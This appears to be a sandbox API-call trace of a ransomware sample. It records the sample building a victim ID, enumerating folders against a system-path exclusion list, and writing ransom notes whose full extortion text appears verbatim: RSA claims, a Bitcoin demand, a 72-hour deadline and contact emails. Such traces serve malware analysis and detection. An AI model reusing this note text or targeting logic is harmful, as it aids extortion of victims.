	[0158.079] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.080] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.080] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0158.081] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.081] CreateFileW (lpFileName="C:\\ProgramData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\programdata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.082] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.082] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.082] WriteFile (in: hFile=0x378, lpBuffer=0x18d9b8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpBuffer=0x18d9b8*, lpNumberOfBytesWritten=0x18da94*=0x30, lpOverlapped=0x0) returned 1
	[0158.082] CloseHandle (hObject=0x378) returned 1
	[0158.083] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.083] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.083] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.084] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\ProgramData\\HELP_DECRYPT_YOUR_FILES.HTML") returned 43
	[0158.084] CreateFileW (lpFileName="C:\\ProgramData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\programdata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.084] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.084] WriteFile (in: hFile=0x378, lpBuffer=0x18cf64*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpBuffer=0x18cf64*, lpNumberOfBytesWritten=0x18da88*=0x808, lpOverlapped=0x0) returned 1
	[0158.087] CloseHandle (hObject=0x378) returned 1
	[0158.088] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.088] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.089] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.089] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
	[0158.090] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.090] CreateFileW (lpFileName="C:\\ProgramData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\programdata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.091] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.091] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.091] WriteFile (in: hFile=0x378, lpBuffer=0x18d978*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpBuffer=0x18d978*, lpNumberOfBytesWritten=0x18da90*=0x43, lpOverlapped=0x0) returned 1
	[0158.091] CloseHandle (hObject=0x378) returned 1
	[0158.092] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*.*" (normalized: "c:\\programdata\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0x77c1d81c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9ab0
	[0158.092] lstrlenW (lpString="C:\\ProgramData\\*.*") returned 18
	[0158.092] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.092] CharLowerBuffW (in: lpsz="C:\\ProgramData\\*.*", cchLength=0x12 | out: lpsz="c:\\programdata\\*.*") returned 0x12
	[0158.093] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.093] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="windows") returned 0x0
	[0158.093] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.093] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="boot") returned 0x0
	[0158.093] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.093] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="system volume information") returned 0x0
	[0158.094] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.094] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.094] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.094] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="temp") returned 0x0
	[0158.094] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.094] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="program files") returned 0x0
	[0158.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.095] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.121] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="appdata") returned 0x0
	[0158.121] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.125] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="application data") returned 0x0
	[0158.125] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.125] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="winnt") returned 0x0
	[0158.125] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.126] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="tmp") returned 0x0
	[0158.126] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.126] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="cache") returned 0x0
	[0158.126] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.156] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.156] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="webcache") returned 0x0
	[0158.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.156] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="inetcache") returned 0x0
	[0158.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.157] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="nvidia") returned 0x0
	[0158.157] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.157] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="packages") returned 0x0
	[0158.157] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.157] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="cookies") returned 0x0
	[0158.157] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.158] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="programdata") returned="programdata\\*.*"
	[0158.158] FindClose (in: hFindFile=0xfb9ab0 | out: hFindFile=0xfb9ab0) returned 1
	[0158.158] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Recovery", cAlternateFileName="")) returned 1
	[0158.158] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1
	[0158.158] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1
	[0158.159] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0158.159] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0158.159] lstrcatW (in: lpString1="C:\\", lpString2="Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery"
	[0158.159] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery"
	[0158.159] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\"
	[0158.159] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\Recovery\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\"
	[0158.159] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="*.*" | out: lpString1="C:\\Recovery\\*.*") returned="C:\\Recovery\\*.*"
	[0158.160] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*" (normalized: "c:\\recovery\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9ab0
	[0158.160] lstrlenW (lpString="C:\\Recovery\\*.*") returned 15
	[0158.160] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.161] CharLowerBuffW (in: lpsz="C:\\Recovery\\*.*", cchLength=0xf | out: lpsz="c:\\recovery\\*.*") returned 0xf
	[0158.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.161] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="windows") returned 0x0
	[0158.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.161] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="boot") returned 0x0
	[0158.162] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.162] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="system volume information") returned 0x0
	[0158.162] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.162] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.162] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.163] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="temp") returned 0x0
	[0158.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.163] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="program files") returned 0x0
	[0158.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.163] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.164] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="appdata") returned 0x0
	[0158.164] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.164] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="application data") returned 0x0
	[0158.164] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.164] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="winnt") returned 0x0
	[0158.164] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.165] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="tmp") returned 0x0
	[0158.165] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.174] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="cache") returned 0x0
	[0158.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.174] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.174] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="webcache") returned 0x0
	[0158.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.175] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="inetcache") returned 0x0
	[0158.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.175] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="nvidia") returned 0x0
	[0158.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.175] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="packages") returned 0x0
	[0158.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.176] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="cookies") returned 0x0
	[0158.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.176] StrStrW (lpFirst="c:\\recovery\\*.*", lpSrch="programdata") returned 0x0
	[0158.176] FindNextFileW (in: hFindFile=0xfb9ab0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.176] FindNextFileW (in: hFindFile=0xfb9ab0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="WINDOW~1")) returned 1
	[0158.177] FindNextFileW (in: hFindFile=0xfb9ab0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="WINDOW~1")) returned 0
	[0158.177] FindClose (in: hFindFile=0xfb9ab0 | out: hFindFile=0xfb9ab0) returned 1
	[0158.177] FindClose (in: hFindFile=0xfb9ab0 | out: hFindFile=0xfb9ab0) returned 0
	[0158.177] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery"
	[0158.178] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\*.*" | out: lpString1="C:\\Recovery\\*.*") returned="C:\\Recovery\\*.*"
	[0158.178] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.178] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.178] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Recovery\\HELP_DECRYPT_YOUR_FILES.TXT") returned 39
	[0158.178] CreateFileW (lpFileName="C:\\Recovery\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\recovery\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.179] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.180] WriteFile (in: hFile=0x378, lpBuffer=0x18cb68*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpBuffer=0x18cb68*, lpNumberOfBytesWritten=0x18da8c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.190] CloseHandle (hObject=0x378) returned 1
	[0158.190] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.191] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0158.192] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.193] CreateFileW (lpFileName="C:\\Recovery\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\recovery\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.193] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.193] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.193] WriteFile (in: hFile=0x378, lpBuffer=0x18d9b8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpBuffer=0x18d9b8*, lpNumberOfBytesWritten=0x18da94*=0x30, lpOverlapped=0x0) returned 1
	[0158.194] CloseHandle (hObject=0x378) returned 1
	[0158.194] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.194] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.195] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.195] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Recovery\\HELP_DECRYPT_YOUR_FILES.HTML") returned 40
	[0158.195] CreateFileW (lpFileName="C:\\Recovery\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\recovery\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.207] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.207] WriteFile (in: hFile=0x378, lpBuffer=0x18cf64*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpBuffer=0x18cf64*, lpNumberOfBytesWritten=0x18da88*=0x808, lpOverlapped=0x0) returned 1
	[0158.210] CloseHandle (hObject=0x378) returned 1
	[0158.211] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.211] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.212] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
	[0158.221] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.221] CreateFileW (lpFileName="C:\\Recovery\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\recovery\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.221] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.221] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.221] WriteFile (in: hFile=0x378, lpBuffer=0x18d978*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpBuffer=0x18d978*, lpNumberOfBytesWritten=0x18da90*=0x43, lpOverlapped=0x0) returned 1
	[0158.222] CloseHandle (hObject=0x378) returned 1
